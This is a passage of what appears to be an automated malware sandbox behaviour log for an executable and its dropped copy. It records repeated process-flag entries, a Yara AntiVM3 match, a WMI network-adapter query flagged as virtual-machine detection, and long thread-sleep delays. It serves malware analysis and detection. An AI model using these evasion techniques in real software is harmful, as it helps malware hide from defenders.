                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: P020241901.exe PID: 4204, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: VKkzqGUhsZwwm.exe PID: 7260, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\P020241901.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\P020241901.exeMemory allocated: 970000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeMemory allocated: 2580000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeMemory allocated: 2390000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeMemory allocated: 7340000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeMemory allocated: 6D20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeMemory allocated: 8340000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeMemory allocated: 9340000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeMemory allocated: 2800000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeMemory allocated: 2A00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeMemory allocated: 2840000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeMemory allocated: B90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeMemory allocated: 2630000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeMemory allocated: 2470000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeMemory allocated: 6FC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeMemory allocated: 69E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeMemory allocated: 6FC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeMemory allocated: 2A60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeMemory allocated: 2AF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeMemory allocated: 4AF0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2478Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2389Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeWindow / User API: threadDelayed 4323Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeWindow / User API: threadDelayed 5507Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeWindow / User API: threadDelayed 2000
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeWindow / User API: threadDelayed 7850
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 6656Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4580Thread sleep count: 2478 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1992Thread sleep count: 110 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7208Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4160Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7212Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6224Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep count: 31 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -99888s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7324Thread sleep count: 4323 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -99774s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -99661s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -99531s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7324Thread sleep count: 5507 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -99422s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -99297s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -99186s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -99077s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -98965s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -98843s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -98734s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -98625s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -98501s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -98375s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -98265s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -98156s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -98047s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -97937s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -97828s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -97718s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -97609s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -97500s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -97390s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -97281s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -97171s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -97062s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -96953s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -96843s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -96734s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -96625s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -96515s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -96406s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -96169s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -96061s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -95953s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -95838s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -95718s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -95609s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -95495s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -95375s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -95265s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -95153s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -95031s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -94921s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -94812s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -94703s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -94593s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -94484s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -94375s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296Thread sleep time: -94265s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7420Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -22136092888451448s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7620Thread sleep count: 2000 > 30
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -99891s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7620Thread sleep count: 7850 > 30
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -99766s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -99656s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -99381s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -99250s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -99141s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -99030s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -98922s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -98813s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -98703s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -98594s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -98469s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -98359s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -98250s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -98139s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -98031s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -97922s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -97812s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -97702s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -97594s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -97469s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -97324s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -97219s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -97109s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -97000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -96891s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -96781s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -96672s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -96563s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -96438s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -96328s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -96219s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -96094s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -95984s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -95875s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -95766s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -95656s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -95547s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612Thread sleep time: -95438s >= -30000s
